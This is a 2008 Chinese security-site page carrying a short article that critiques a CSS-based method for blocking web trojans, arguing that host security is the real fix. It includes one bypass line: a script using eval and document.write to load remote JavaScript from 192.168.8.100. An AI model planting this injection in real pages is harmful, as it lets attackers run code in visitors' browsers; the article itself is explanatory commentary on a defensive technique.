通行证│用户名:
密码:
验证码:
电信
┊
网通
┊
铁通
┊
移动
在线
人
文章搜索:
热门搜索:
红客
黑鹰
红客技术
安全动画
红客培训
首页
文章
软件
动画
资源
励志
论坛
邮箱
会员
军事
科技
博客
爱心红客
最近更新
800g资源
业内新闻
漏洞公告
病毒公告
电脑知识
网络知识
菜鸟入门
攻防教程
黑客攻防
安全编程
工具使用
综合安全
个人安全
安全相关
Q Q安全
原创精华
红客人物
站内事件
您现在的位置:
爱国者安全网
>>
文章类
>>
红客教程
>>
网络攻防
>> 文章正文
关于<<二行代码解决全部网页木马>>的文章
责任编辑:酷酷の鱼 更新日期:2008-4-14
作者:lcx
来源:vbs小铺
原文在这:
http://www.blueidea.com/tech/web/2008/5575.asp
主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会
突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。
代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>
上一篇文章:
一次简单的php源代码泄露漏洞发掘
下一篇文章:
关于public权限执行系统命令
最近更新
瑞星公司04月14日发布 每日计算机病毒及木马播报
企业安全扯淡之意识与策略
推荐:企业安全扯淡之YY内网准入以及划分
关于public权限执行系统命令
关于<<二行代码解决全部网页木马>>的文章
一次简单的php源代码泄露漏洞发掘
利用Gmail插件Gmail Romote Command(GRC)远程控制电脑
Mysql5注射技巧总结
Cisco IOS的OSPF、Sup720或RSP720等拒绝服务漏洞
Microsoft SharePoint 服务器源码 HTML 注入漏洞
热门文章
映像劫持与反劫持技术
虚拟影子系统 有效防止恶意程序
迅雷状告超级兔子 蔡旋回应
中国是"间谍软件"最大受害国之一 美国攻击最
张家口网通管理后台口令简单 被非法进入
七部委拟建违禁品网上交易黑名单
详解IE8新增两项重要安全功能
研究显示3%的互联网通讯是DDOS攻击数据
浏览器Firefox十处漏洞 半数被评"危急"
警惕:病毒将开始利用Real Player漏洞广泛传播
精彩专题
